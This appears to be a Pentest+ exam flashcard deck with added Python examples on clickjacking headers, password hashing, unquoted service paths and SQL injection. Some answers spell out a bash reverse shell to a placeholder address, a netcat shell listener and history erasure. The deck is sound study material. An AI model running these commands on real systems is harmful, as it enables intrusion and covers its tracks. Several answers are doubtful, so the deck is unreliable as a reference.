Pentest+
-f
Which option causes nmap to scan using tiny, fragmented packets in an attempt to fool a packet filtering firewall?
-D (decoy scan; -S sets a single spoofed source address instead)
Which option causes nmap to send scans that appear to come from spoofed IP addresses?
-T<0-5> (timing template; -T0 or -T1 slows the scan down)
Which option is used with the nmap command to throttle the rate at which it sends probes?
Dictionary attack
Which password-cracking method leverages wordlists, which are expanded with real-world passwords as those passwords are discovered?
Rainbow tables
Which password-cracking method requires extensive storage capacity, sometimes more than 300 GB in total?
OWASP Testing Project
Which penetration testing methodology is focused on web application penetration testing?
White box
Which penetration testing methodology may require valid authentication credentials or other information granting intimate knowledge of an environment or network?
Management frame
Which type of primary frame (defined by the IEEE 802.11 wireless standard) enables stations to establish and sustain communication over the network with an access point?
Control frame
Which type of primary frame (defined by the IEEE 802.11 wireless standard) facilitates delivery of data frames to each station?
Script kiddies, or "skids"
Which type of threat actor is generally unskilled, is typically motivated by curiosity or personal profit, and is frequently indicated by the use of publicly available exploits?
Credentialed
Which type of vulnerability scan can usually identify the most vulnerabilities?
Discovery
Which type of vulnerability scan is least likely to be detected by an intrusion prevention system (IPS) or intrusion detection system (IDS)?
Full
Which type of vulnerability scan is more likely to be used by a defender rather than a penetration tester?
Full
Which type of vulnerability scan is most likely to be detected by an intrusion prevention system (IPS) or intrusion detection system (IDS)?
Discovery
Which type of vulnerability scan is the least intrusive on the target network?
Noncredentialed
Which type of vulnerability scan most closely approximates the perspective that an external hacker would have of the network?
Emergency fail open
Which of the following features of an egress sensor can be manipulated to allow a penetration tester to enter a building without authorization?
Unquoted service paths
Which of the following functionalities can an attacker abuse to try to elevate privileges if the service is running under SYSTEM privileges?
Dumpster diving
Which of the following involves an unauthorized individual searching and attempting to collect sensitive information from the trash?
Shoulder surfing
Which of the following involves obtaining information such as personally identifiable information (PII), passwords, and other confidential data by looking at someone's laptop, desktop, or mobile device screen?
XSD
Which of the following is a World Wide Web Consortium (W3C) specification that identifies how to define elements within an XML document?
Fuzzing
Which of the following is a black-box testing technique that consists of sending malformed or semi-malformed data to an application in an automated fashion?
DirBuster
Which of the following is a brute-force utility that can be used by penetration testers to discover directories and files on a web server?
PowerSploit
Which of the following is a collection of PowerShell modules that can be used for post-exploitation and other phases of an assessment?
Dynamic ARP inspection (DAI)
Which of the following is a common mitigation for ARP cache poisoning attacks?
CPassword
Which of the following is a component of Active Directory's Group Policy Preferences that allows administrators to set passwords via Group Policy?
Master service agreement (MSA)
Which of the following is a contract where both parties agree to most of the terms that will govern future agreements?
Admin passwords may be easily guessed. Admin passwords are almost guaranteed to be in any major wordlist used in dictionary attacks. Admin passwords will be found with a brief Internet search for the service in question.
Which of the following is a danger associated with the use of default authentication credentials on a system or service?
SOW
Which of the following is a document defined during the planning and scoping phase of a penetration test that identifies specific techniques, tools, activities, deliverables, and schedules for the test?
Statement of work (SOW)
Which of the following is a formal document that defines exactly what will be done during a penetration test?
MD5
Which of the following is a hashing algorithm that should be avoided?
Credentialed scans produce fewer false positives (uncredentialed scans are known to more commonly produce them).
Which of the following is a major benefit of running a credentialed vulnerability scan over an uncredentialed scan?
Implement DNSSEC.
Which of the following is a mechanism that can be used to defend against DNS poisoning attacks?
SOAP
Which of the following is a messaging protocol specification that defines how structured information can be exchanged between web applications, with its services described by WSDL files?
Setting the X-Frame-Options header (DENY or SAMEORIGIN), or the newer Content Security Policy frame-ancestors directive that supersedes it
Which of the following is a mitigation technique for preventing clickjacking attacks?
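As an added example (not part of the original card deck), the check below decides whether a set of HTTP response headers actually stops a page from being framed by a third-party site. The header dictionaries are constructed for illustration; CSP frame-ancestors takes precedence over X-Frame-Options when both are present, and the obsolete ALLOW-FROM form is treated as no protection because current browsers ignore it.

```python
"""Evaluate clickjacking defences in a set of HTTP response headers.

Added example, not from the original deck. Header sets are constructed.
"""

from typing import Dict, List


def parse_frame_ancestors(csp: str) -> List[str]:
    """Return the source list of the frame-ancestors directive, [] if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return []


def framing_blocked(headers: Dict[str, str]) -> bool:
    """True if a browser honouring these headers refuses to render the page
    inside a frame on any third-party origin.

    CSP frame-ancestors, when present, overrides X-Frame-Options, so it is
    checked first. Header names are matched case-insensitively.
    """
    lowered = {k.lower(): v for k, v in headers.items()}

    ancestors = parse_frame_ancestors(lowered.get("content-security-policy", ""))
    if ancestors:
        # 'none' or 'self' alone keep third parties out; a listed host does not.
        return all(src in ("'none'", "'self'") for src in ancestors)

    xfo = lowered.get("x-frame-options", "").strip().upper()
    # ALLOW-FROM is obsolete and ignored by modern browsers, so only DENY and
    # SAMEORIGIN count as a working defence.
    return xfo in ("DENY", "SAMEORIGIN")


# Constructed sample responses, as a tester might record them per URL.
SAMPLE_RESPONSES = {
    "/login": {"X-Frame-Options": "DENY"},
    "/legacy": {"X-Frame-Options": "ALLOW-FROM https://intranet.example"},
    "/app": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "/widget": {
        "Content-Security-Policy": "frame-ancestors 'self' https://partner.example",
        "X-Frame-Options": "DENY",  # overridden by the CSP directive above
    },
    "/about": {"Content-Type": "text/html"},
}


def frameable_urls(responses: Dict[str, Dict[str, str]]) -> List[str]:
    """URLs that a cross-origin attacker page could load in an iframe."""
    return [url for url, hdrs in responses.items() if not framing_blocked(hdrs)]


if __name__ == "__main__":
    for url in frameable_urls(SAMPLE_RESPONSES):
        print(f"{url}: can be framed by a third-party site")
```

The /widget case is the one worth noticing during a review: a DENY header looks fine on its own, but the CSP directive next to it is what the browser follows, and it permits a partner origin.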
Swagger
Which of the following is a modern framework of API documentation and development and the basis of the OpenAPI Specification (OAS), which can be very useful for pen testers to get insights into an API?
Rainbow table
Which of the following is a precomputed list of hash values for common passwords that can be used for offline password file cracking?
Swagger
Which of the following is an open source framework designed to help developers design, build, document, and test Representational State Transfer (REST) web services?
Mimikatz
Which of the following is an open source tool that allows an attacker to retrieve user credential information from the targeted system and potentially perform pass-the-hash and pass-the-ticket attacks?
OpenVAS
Which of the following is an open source vulnerability scanner?
Nikto
Which of the following is an open source web vulnerability scanner?
Aircrack-ng
Which of the following is an open-source suite of tools useful for conducting RF communication monitoring and security testing of wireless networks?
theHarvester
Which of the following is an open-source, Python-based tool that runs strictly from the standard user command line and includes both passive and active options for intelligence collection (numerous command-line switches enable or disable functionality such as limiting queries to a specific search engine or running searches for identified IP addresses and hostnames in Shodan)?
Unauthorized function or API use
Which of the following is best defined as a software vulnerability stemming from developer interfaces being left available to remote users, usually either unintentionally through a failure to disable the feature or intentionally as a backdoor or tool meant to make administration simpler?
Salting
Which of the following is commonly used to prevent precomputation attacks on hashed passwords by adding random bits to the hashing operation?
Key stretching
Which of the following is commonly used to prevent precomputation attacks on hashed passwords by running the value to be hashed through the hash function multiple times?
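As an added example (not from the original deck) covering the rainbow table, MD5, salting and key stretching cards above: a precomputed lookup table cracks unsalted MD5 digests in one dictionary hit, while a salted PBKDF2 hash forces the attacker to redo the stretched computation for every guess and every user. The wordlist and the stored hashes are constructed for illustration; the table here is a plain digest-to-password dictionary, the same idea as a rainbow table without the chain compression that keeps real tables down to hundreds of gigabytes.

```python
"""Precomputed-table cracking versus salted, stretched password hashes.

Added example, not from the original deck. Wordlist and hashes are constructed.
"""

import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional, Tuple

WORDLIST = ["password", "123456", "letmein", "Summer2023!", "admin"]  # constructed
ITERATIONS = 100_000  # PBKDF2 work factor: the key-stretching knob


def md5_hex(word: str) -> str:
    """Unsalted MD5, the storage scheme that should be avoided."""
    return hashlib.md5(word.encode()).hexdigest()


def build_lookup_table(words: Iterable[str]) -> Dict[str, str]:
    """Hash the wordlist once; the table works against every unsalted victim."""
    return {md5_hex(w): w for w in words}


def crack_unsalted(md5_digest: str, table: Dict[str, str]) -> Optional[str]:
    """O(1) lookup: no hashing at crack time at all."""
    return table.get(md5_digest.lower())


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Fresh 16-byte random salt plus PBKDF2-HMAC-SHA256 over ITERATIONS rounds."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute with the stored salt; constant-time compare to avoid leaking."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


def crack_salted(salt: bytes, digest: bytes, words: Iterable[str]) -> Optional[str]:
    """The attacker's only route: run every guess through the full stretched
    hash with this user's salt. Nothing computed here helps against another
    user, because that user has a different salt."""
    for w in words:
        if verify_password(w, salt, digest):
            return w
    return None


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted md5 of 'password' ->", crack_unsalted(md5_hex("password"), table))

    salt_a, dig_a = hash_password("letmein")
    salt_b, dig_b = hash_password("letmein")
    print("same password, equal stored digests?", dig_a == dig_b)
    print("per-user dictionary attack ->", crack_salted(salt_a, dig_a, WORDLIST))
```

With a five-word list the salted attack still succeeds, which is the point: salting and stretching do not make a weak password strong, they only remove the precomputation shortcut and multiply the per-guess cost by the iteration count and the number of users.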
Thorough review of application code outside of a running system for details on the vulnerability
Which of the following is not a benefit of performing vulnerability scanning during a penetration test?
Exploits
Which of the following is not a commonly reported theme or issue in vulnerability scan results?
PoC exploit code
Which of the following is not a detail of CVEs maintained by the CVE Numbering Authority?
Posing as a representative of a company's IT department and convincing the COO to provide his VPN credentials over the phone
Which of the following is not a method of bypassing Network Access Control (NAC)?
A phishing campaign using whaling
Which of the following is not a motivation technique used by social engineers?
"Layer Multi-Name Resolution (LLMNR)" (a fake expansion; the real LLMNR, Link-Local Multicast Name Resolution, is a name resolution protocol)
Which of the following is not a name-to-IP address resolution technology or protocol?
PowerShell hash store
Which of the following is not a place where Windows stores password hashes?
Password is over 50 characters long with a large character set.
Which of the following is not a potential characteristic of weak authentication credentials?
Clickjacking
Which of the following is not a potential consequence of a lack of error handling or excessively verbose error handling in servers, web applications, and databases?
Beacon frame
Which of the following is not a primary type of frame defined by the IEEE 802.11 wireless communication standard?
The Japan Computer Emergency Response Team (JPCERT)
Which of the following is not a publicly accessible list used for vulnerability research and analysis?
Programming concepts
Which of the following is not a security weakness category as maintained by CWE?
SQLmap
Which of the following is not a tool that can be used to enumerate the available ports and protocols opened on a victim system?
Nmap
Which of the following is not a tool that is commonly used for passive reconnaissance?
IDA
Which of the following is not a vulnerability scanner commonly used in penetration testing?
Selecting targets by running Nmap or a similar scanner
Which of the following is not an element of pre-engagement tasks?
Linux servers
Which of the following is not an example of a nontraditional asset?
REST
Which of the following is not an example of an HTTP method?
HIPAA
Which of the following is not an example of regulations or regulatory bodies applicable to the financial sector?
Windows PowerSploit
Which of the following is not an insecure service or protocol?
The public reputation of the developers of the software or operating system being tested
Which of the following is not an issue to consider when performing a vulnerability scan?
Nessus
Which of the following is not an open source intelligence (OSINT) gathering tool?
Cross-site request forgery (CSRF)
Which of the following is not one of the top mobile security threats and vulnerabilities?
USB key drop attacks are not effective anymore.
Which of the following is not true about USB key drop attacks?
CSRF attacks typically affect applications (or websites) that rely on digital certificates that have been expired or forged.
Which of the following is not true about cross-site request forgery (CSRF or XSRF) attacks?
An interrogator cannot use closed-ended questions to gain more control of the conversation.
Which of the following is not true about elicitation and interrogation?
Pharming can be done by exploiting a buffer overflow using Windows PowerShell.
Which of the following is not true about pharming?
-oX
Which option causes nmap to save its output to an XML-formatted text file in the file system of the host where it was run?
-F
Which option causes nmap to scan a host for only the 100 most commonly used TCP ports, such as 20, 21, 23, 25, 53, 80, etc.?
-iR
Which option causes nmap to scan a specified number of random hosts?
Credentialed
Which type of vulnerability scan most closely approximates the perspective that an internal system administrator would have of the network?
Full
Which type of vulnerability scan produces the most accurate results?
Stealth
Which type of vulnerability scan sends SYN packets to network hosts to enumerate them?
Noncredentialed
Which type of vulnerability scan usually identifies the least number of vulnerabilities?
HTTP parameter pollution
Which type of web application test attempts to provoke unexpected responses by feeding arbitrary values into web page parameters?
VoIP phones; SCADA devices
Which types of network devices are commonly whitelisted in many NAC implementations? (Choose two.)
SET
Which utility is used to conduct social engineering exploits?
Fragmentation attack
Which wireless encryption key cracking exploit involves extracting a small amount of keying material from captured wireless packets and then sending ARP frames to the access point?
Credential harvesting
Which wireless exploit could be carried out by creating a fake captive portal for a wireless network that captures victims' usernames and passwords?
Bluesnarfing
Which wireless exploit involves creating an unauthorized connection with a Bluetooth device, such as a mobile phone, and stealing information from it?
Bluejacking
Which wireless exploit involves sending unsolicited messages over a Bluetooth connection to a wireless device?
WPS cracking
Which wireless exploit involves using a brute-force attack to crack an eight-digit pin?
Jamming attack
Which wireless exploit is more of a stress test designed to prevent users from being able to use a wireless network?
Karma attack
Which wireless exploit uses a special wireless device to listen for SSID requests from other wireless devices and then impersonate the requested access point?
Filtered
When running an Nmap SYN scan, what will be the Nmap result if ports on the target device do not respond?
-eq
As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use?
Authority
A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be the director of operations. The email asks the employee to reply with sensitive internal information. What motivation factor did the penetration tester use in this scenario?
Man-in-the-middle
A replay attack is commonly categorized as which type of exploit?
Hyper-V; Active Directory Federation Services
A Windows server is functioning as an Active Directory domain controller for an organization's network. Which of the following services are not required for it to fulfill this role? (Choose two.)
Compliance
A _______ vulnerability scan would typically be focused on a specific set of requirements.
Gray
A ________-box test is a test in which the penetration tester is given some information about the target but not all information.
It may be illegal to transport some penetration testing software and hardware internationally.
A client has asked you to run a white box penetration test. Her organization has offices in the United Kingdom, Saudi Arabia, Pakistan, and Hong Kong. You load your penetration testing toolkit onto your laptop and travel to each office to run the assessment on-site. What did you do incorrectly in this scenario?
Screenshots of exploitation or vulnerabilities
When detailing findings in a penetration test report, which of the following can serve as evidence for the purpose of attestation? (Choose all that apply.)
No, it is legal to transport most penetration testing software into these countries.
A client has asked you to run a white box penetration test. Her organization has offices in the United States, Indonesia, Thailand, and Singapore. To avoid international transportation of your penetration testing software, you upload it to your Google Drive account. Then you travel to each site, download the software, and run it locally on your laptop. Did you handle your penetration testing software appropriately in this scenario?
Software Development Kit (SDK) documentation; Application Programming Interface (API) documentation
A client has asked you to run a white box penetration test. The goal is to assess the security of several PC applications that were written in-house using the C++ programming language. These applications are used on a day-to-day basis by employees to manage orders, inventory, and payouts. During the scoping process, you determine that it would be helpful if you had access to the organization's internal software development documentation for these applications. Which of the following should you ask your client for? (Choose two.)
Web Application Description Language (WADL) documentation
A client has asked you to run a white box penetration test. The goal is to assess the security of their web-based applications. These applications are based on Representational State Transfer (REST) architecture. During the scoping process, you determine that it would be helpful if you had access to the organization's internal documentation for these applications. Which of the following should you ask your client for?
Web Services Description Language (WSDL) documentation
A client has asked you to run a white box penetration test. The goal is to assess the security of their web-based applications. These applications leverage the Simple Object Access Protocol (SOAP). During the scoping process, you determine that it would be helpful if you had access to the organization's internal documentation for these applications. Which of the following should you ask your client for?
Compliance
A client has hired you to perform a PCI-DSS penetration test. What kind of vulnerability scan would you likely perform during this test?
Goal-based
A client has hired you to test the physical security of their facility. They have given you free rein to try to penetrate their facility using whatever method you want as long as it doesn't harm anyone or damage the property. What type of assessment is being conducted in this scenario?
Advanced persistent threat (APT) actors
A client has recently come to you voicing concern over a large number of companies being compromised by remote attackers who are looking for trade secrets. What best describes the types of adversaries that would be looking for trade secrets?
Testing should focus on the discovery of potential security issues through all in-scope systems, not just on determining the effectiveness of active defenses such as the IPS.
A client has requested an external network penetration test, but during the discussion between the penetration tester and the client, the client is reluctant to add the tester's source IP address to their IPS whitelist for the duration of the test. Which argument best describes why the tester's source IP address should be on the client's IPS whitelist?
The bands and frequencies of the wireless devices used by the client
A client has requested that a wireless penetration test be done. Which scoping target information will most likely be needed before testing can start?
Insider threat
A company has been hacked, and several e-mails that are embarrassing to the CFO and potentially indicative of criminal activity on their part have been leaked to the press. Incident response has determined that only three user accounts accessed the organization's mail server in the 24 hours immediately preceding the disclosure. One of these accounts was assigned to an employee who was fired two weeks before the incident. No other access to the system has been found by incident response. What type of threat actor should be considered a likely culprit for this breach first?
Maltego
A consultant has been hired by an organization to perform a black box penetration test. She has used a variety of tools to gather OSINT about the target information. Her efforts have been very successful. In fact, she has gathered so much information that she is having a hard time organizing it into a format that she can use efficiently. Which tool could she use to organize the information that she has gathered?
Shodan
A consultant has been hired by an organization to perform a black box penetration test. She knows that Internet of Things (IoT) devices frequently employ weak security mechanisms that a penetration tester can exploit. She wants to discover whether the target organization has any of these devices deployed. Which utility could she use to do this?
nmap
A consultant has been hired by an organization to perform a black box penetration test. She wants to perform a detailed scan of the target organization's public-facing web server to see what she can learn. Which utility should she use to accomplish this?
Gray box assessment
A consultant has been hired by an organization to perform a penetration test. The target of the test is the organization's HR database application. The tester has been given a desk, a computer connected to the organization's network, and a network diagram. However, the tester has not been given any authentication credentials. What type of test is being conducted in this scenario?
Black box assessment
A consultant has been hired by an organization to perform a penetration test. The target of the test is the organization's e-commerce website. The tester, located in a different city, will utilize several different penetration testing tools to analyze the site and attack it. The tester does not have any information about the site or any authentication credentials. What type of test is being conducted in this scenario?
White box assessment
A consultant has been hired by an organization to perform a penetration test. The target of the test is the organization's internal firewalls. The tester has been given a desk, a computer connected to the organization's network, and a network diagram. The tester has also been given authentication credentials with a fairly high level of access. What type of test is being conducted in this scenario?
Compliance-based assessment
A consultant has been hired to perform a penetration test for an organization in the healthcare industry. The target of the test is a public-facing self-service website that users can access to view their health records. The aim is to circumvent security measures and gain unauthorized access to this information. What type of assessment is being conducted in this scenario?
White box assessment
A consultant has been hired to perform a penetration test for an organization in the healthcare industry. The target of the test is a public-facing self-service website that users can access to view their health records. The penetration tester has been given full knowledge of the organization's underlying network. What type of test is being conducted in this example?
Red team assessment
A consultant has been hired to perform a penetration test for an organization. The target of the test is the organization's proprietary design documents. The aim is to circumvent security measures and gain unauthorized access to these documents. What type of assessment is being conducted in this scenario?
Government restriction
A defense contractor that manufactures hardware for the U.S. military has put out a request for proposal for penetration tests of a new avionics system. The contractor indicated that penetration testers for this project must hold a security clearance. Which of the following is the most likely explanation for this requirement?
It is an active scanning technique; it performs a simple ping test to determine whether a host is up and alive on the network.
A discovery scan in nmap is described by which of the following statements? (Choose two.)
Organized crime
A group of hackers located in a former Soviet-bloc nation have banded together and released a ransomware app on the Internet. Their goal is to extort money in the form of crypto currency from their victims. What kind of attacker is this?
Impersonation
A help desk technician receives a phone call from someone claiming to be an employee. This person has been locked out of an account and is requesting assistance to unlock it. The help desk asks for proof of identity before access will be granted. What type of attack was the caller trying to perform?
The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.
A junior technician in an organization's IT department runs a penetration test on a corporate web application. During testing, the technician discovers that the application can disclose a SQL table with all user account and password information. How should the technician notify management?
Statement of work
When finalizing a penetration test report prior to delivery to a client, which document should be consulted to ensure that all acceptance criteria are being met?
No, you should have spent more time understanding the target audience before scoping the assessment.
A new client calls to schedule a gray box penetration test. You gather some basic information about the client over the phone, put together a scope for the test, and create a schedule for the test. You then hire several contractors to help conduct the test and begin the assessment on the scheduled date. Did you scope this assessment properly?
JTAG debug exploit
A penetration tester connects a special device to a diagnostic port implemented in the motherboard by the manufacturer and is able to capture data from system registers. What type of exploit occurred in this scenario?
Tailgating
A penetration tester enters the target organization's physical facility by striking up a conversation with an employee in the parking lot and walking with her through a door that uses a proximity badge reader to control access. The employee uses her badge to open the door and holds it open for the penetration tester. What is this technique called?
Piggybacking
A penetration tester enters the target organization's physical facility by walking behind an employee and grabbing the authentication-protected door before it shuts all of the way. What is this technique called?
Advanced persistent threat (APT)
A penetration tester has been asked by a client to imitate a recently laid-off help desk technician. What best describes the abilities of a threat actor?
Static code analysis
A penetration tester has been asked by a client to perform a code review of a web application. What type of analysis is the penetration tester performing?
TCP SYN flood
A penetration tester has been asked by a client to review a new web application for availability. Which of the following types of attacks should the tester utilize?
Badge cloning
A penetration tester has been asked to assess a client's physical security by gaining access to its corporate office. The tester is looking for a method that will allow him to enter the building during both business hours and after hours. What would be the most effective method for the tester to attempt?
A discovery scan
A penetration tester has been asked to determine whether the client's server farm is compliant with the company's software baseline by conducting a remote scan. What type of scan should the tester perform to verify compliance?
Limited network access; Storage access
A penetration tester has completed a simple compliance scan of a client's network. The results indicate that there is a subset of assets on a network. This information differs from what was shown on the network architecture diagram that was given to the tester prior to testing. What is most likely the cause for the discrepancy? (Choose two.)
Begin an SNMP password brute-force attack
A penetration tester has discovered a Supervisory Control and Data Acquisition (SCADA) device in one of the VLANs in scope. What action best creates a potentially damaging outcome against the device?
By attempting privilege escalation attacks
A penetration tester has found a few unquoted service paths during a test of a client's network. How can the tester use these vulnerabilities to his advantage?
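As an added example (not from the original deck) for the two unquoted-service-path cards, the function below enumerates the files Windows would try to execute before reaching the real binary, which is exactly the list of files a tester would try to plant. The service entries are constructed for illustration; on a real host the ImagePath values come from HKLM\SYSTEM\CurrentControlSet\Services or `wmic service get name,pathname`. Exploitation still needs write access to one of the listed directories, a service that runs as SYSTEM, and a way to restart it or the host.

```python
"""Enumerate hijack candidates for unquoted Windows service paths.

Added example, not from the original deck. Service entries are constructed.
"""

import ntpath
from typing import Dict, List


def hijack_candidates(image_path: str) -> List[str]:
    """Return the paths Windows tries, in order, before the real executable.

    An empty list means the entry is not exploitable this way (quoted path,
    or no spaces in the part of the path before the executable).
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []  # quoted: the loader knows exactly which file to run

    # Only the portion up to and including the executable name matters; anything
    # after the .exe is arguments and plays no part in the lookup. If no token
    # ends in .exe, the whole string is treated as the path.
    tokens = path.split(" ")
    exe_index = next(
        (i for i, t in enumerate(tokens) if t.lower().endswith(".exe")),
        len(tokens) - 1,
    )
    tokens = tokens[: exe_index + 1]

    candidates = []
    for i in range(1, len(tokens)):  # every prefix that ends at a space
        prefix = " ".join(tokens[:i])
        # CreateProcess appends .exe when the candidate has no extension
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def find_vulnerable(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each service with an exploitable path to its hijack candidates."""
    result = {}
    for name, image_path in services.items():
        candidates = hijack_candidates(image_path)
        if candidates:
            result[name] = candidates
    return result


# Constructed data, not from a real host.
SAMPLE_SERVICES = {
    "VendorAgent": r"C:\Program Files\Vendor App\bin\agent.exe -service",
    "Spooler": r"%SystemRoot%\System32\spoolsv.exe",
    "Backup": r'"C:\Program Files\Backup Tool\backup.exe" /run',
}

if __name__ == "__main__":
    for name, paths in find_vulnerable(SAMPLE_SERVICES).items():
        print(name)
        for p in paths:
            print("   would run first if present:", p)
```

For VendorAgent the loader looks for C:\Program.exe and then C:\Program Files\Vendor.exe before the intended agent.exe; C:\ is rarely writable by standard users, but vendor directories under Program Files sometimes are, which is what makes the finding worth reporting.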
dsquery user -inactive 4 (the -inactive value is in weeks, so 4 covers roughly 30 days)
A penetration tester has full access to a domain controller and wants to discover any user accounts that have not been active for the past 30 days. What command should the penetration tester use?
Disable the unneeded services.
A penetration tester has performed a security assessment for a client. It is observed that there are several high-numbered ports listening in on a public web server. The client indicates that they are only using port 443 for an application. What should the tester recommend to the client?
Correct the most critical vulnerability first, even if it means that fixing the other vulnerabilities may take longer to correct.
A penetration tester has performed a security assessment for a client. The report lists a total of nine vulnerabilities, with four of those determined to be critical. The client does not have the budget to immediately correct all of the vulnerabilities. What should the tester suggest is the best option for the client given these circumstances?
Use blacklist validation for the SQL statements; Use whitelist validation for the SQL statements
A penetration tester has recently finished a test that revealed that a legacy web application is vulnerable to SQL injections. The client indicates that remediating the vulnerability would require an architectural change and that management does not want to risk anything happening to the current application. Which of the following conditions would minimize the SQL injection risk while providing a low-effort and short-term solution? (Choose two.)
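As an added example (not from the original deck), the block below puts the legacy string-built query, the two short-term validations from the card, and the real fix side by side. The in-memory SQLite table and the inputs are constructed for illustration. The blacklist is written the way legacy code often does it, by stripping bad tokens in one pass, which is what lets a stacked token such as OORR survive as OR; the whitelist only accepts characters a username can legitimately contain and so stops the payload outright.

```python
"""SQL injection: vulnerable query, blacklist and whitelist validation, and
a parameterised query. Added example, not from the original deck. Data is
constructed.
"""

import re
import sqlite3
from typing import List, Optional, Tuple

Row = Tuple[str, str]

_conn = sqlite3.connect(":memory:")
_conn.executescript(
    """
    CREATE TABLE users (username TEXT, role TEXT);
    INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user'), ('carol', 'user');
    """
)


def find_user_vulnerable(username: str) -> List[Row]:
    """Legacy code: input concatenated straight into the statement."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return _conn.execute(sql).fetchall()


# --- short-term mitigation 1: blacklist (strip known-bad tokens) -----------
_BAD_TOKENS = re.compile(r"OR|UNION|--|;|/\*", re.IGNORECASE)


def sanitize_blacklist(value: str) -> str:
    """One pass of token removal; a stacked token like OORR collapses to OR."""
    return _BAD_TOKENS.sub("", value)


def find_user_blacklisted(username: str) -> List[Row]:
    try:
        return find_user_vulnerable(sanitize_blacklist(username))
    except sqlite3.Error:
        return []  # legacy habit: a broken statement is reported as "no match"


# --- short-term mitigation 2: whitelist (accept only known-good input) ------
_ALLOWED = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def passes_whitelist(value: str) -> bool:
    return _ALLOWED.fullmatch(value) is not None


def find_user_whitelisted(username: str) -> Optional[List[Row]]:
    """None means the input was rejected before touching the database."""
    if not passes_whitelist(username):
        return None
    return find_user_vulnerable(username)


# --- proper fix: bound parameter, data can never become SQL syntax ----------
def find_user_parameterised(username: str) -> List[Row]:
    return _conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    payload = "' OR '1'='1"            # classic tautology
    stacked = "' OORR '1'='1"          # survives single-pass token stripping
    print("vulnerable   :", len(find_user_vulnerable(payload)), "rows")
    print("blacklisted  :", len(find_user_blacklisted(payload)), "rows")
    print("blacklist+   :", len(find_user_blacklisted(stacked)), "rows")
    print("whitelisted  :", find_user_whitelisted(payload))
    print("parameterised:", len(find_user_parameterised(payload)), "rows")
```

The blacklist also mangles legitimate input such as the name Orwell, which is the usual reason it gets loosened over time; the whitelist does not have that problem for this field, but neither validation is a substitute for the parameterised query once the architectural change is approved.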
ADMIN$ and IPC$ (PsExec copies its service binary to ADMIN$ and drives the Service Control Manager and its named pipes over IPC$)
A penetration tester has successfully captured the administrator credentials of a remote Windows machine. The tester is now attempting to access the system by using PsExec. However, the tester is denied permission. What shares must be accessible for a successful PsExec connection?
Secure Shell (SSH) Wireshark
A penetration tester has successfully exploited a DMZ server that seems to be listening on an outbound port. The tester wants to forward that traffic back to a device. What are the best tools to do this? (Choose two.)
$ history -c
A penetration tester has successfully exploited an application vulnerability and now needs to remove the command history from the Linux session. Which command will remove the command history?
A spear phishing attack
A penetration tester has used Social Engineer Toolkit (SET) to make a copy of a company's cloud-hosted web mail portal and then sends an email to try to obtain the CEO's login credentials. This is an example of what type of attack?
Lock bypass
A penetration tester impersonates a heating and cooling repair person to gain physical access to the target organization's facility. Once inside, she requests access to the server room to investigate a problem with the cold air return. As she is leaving the server room, she surreptitiously places a piece of strong tape over the door locking tab, allowing her to return into the room later without authorization. What is this technique called?
Lock bypass
A penetration tester impersonates a heating and cooling repair person to gain physical access to the target organization's facility. Once inside, she requests access to the server room to investigate a problem with the cold air return. As she is leaving the server room, she surreptitiously places a small wooden wedge into the door jam, preventing the door from closing completely. This allows her to return into the room later without authorization. What is this technique called?
Repeating attack
A penetration tester impersonates a vending machine repair person to gain access to the target organization's facility. While inside, the tester hides a wireless device behind a vending machine that captures the organization's wireless network radio signal and rebroadcasts it with high gain towards the parking lot. Which wireless exploit did the tester employ in this scenario?
Lock picking
A penetration tester impersonates a vending machine repair person to gain physical access to the target organization's facility. Once inside, he notices that the door to the server room uses a simple pushbutton door lock that doesn't use any kind of electronic authentication. Which physical security attack could he use to gain access to the server room?
Lock bypass
A penetration tester is attempting a physical security assessment and wants to use an "under-the-door tool" during the test. Which of the following intrusion techniques should the tester attempt?
The MAC address of the gateway
A penetration tester is conducting ARP spoofing against a switch. Which of the following should the tester trick to get the most information?
DNS cache poisoning
A penetration tester is conducting a gray box penetration test. She crafts a Trojan horse exploit that flushes the DNS cache on the local workstation and replaces it with malicious name resolution entries that point to a fake web server. When clients within the organization try to resolve hostnames, the malicious entries from the local DNS cache are used. What is this exploit called?
DNS cache poisoning
A penetration tester is conducting a gray box penetration test. She notices that one of the branch offices of the organization uses a caching-only DNS server to handle name resolution requests. She sends a bogus reply to a name resolution request from the caching-only DNS server, using a spoofed source address in the reply packets. The bogus name resolution records point users to a fake web server that is used to harvest authentication credentials. What is this exploit called?
Stored cross-site scripting (XSS)
A penetration tester is conducting a scan of a web application. During the review of the scan results, which of the following vulnerabilities would be the most critical and should be prioritized for exploitation?
bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
A penetration tester is conducting a test and gains access into an unrestricted system network by using port 443. The tester wants to create a reverse shell from the client back to the tester. Which of the following methods is most likely what the tester will use?
nc -lp 4444 -e /bin/bash
A penetration tester is conducting a test and has compromised the client's host. What is the correct syntax to create a Netcat listener on this device?
The HTTP POST method
A penetration tester is conducting a test on a web application and discovers that the user login process sends form field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent by using which of the following?
For all logons, require multifactor authentication. Increase minimum password complexity requirements. On every workstation, enable full-disk encryption.
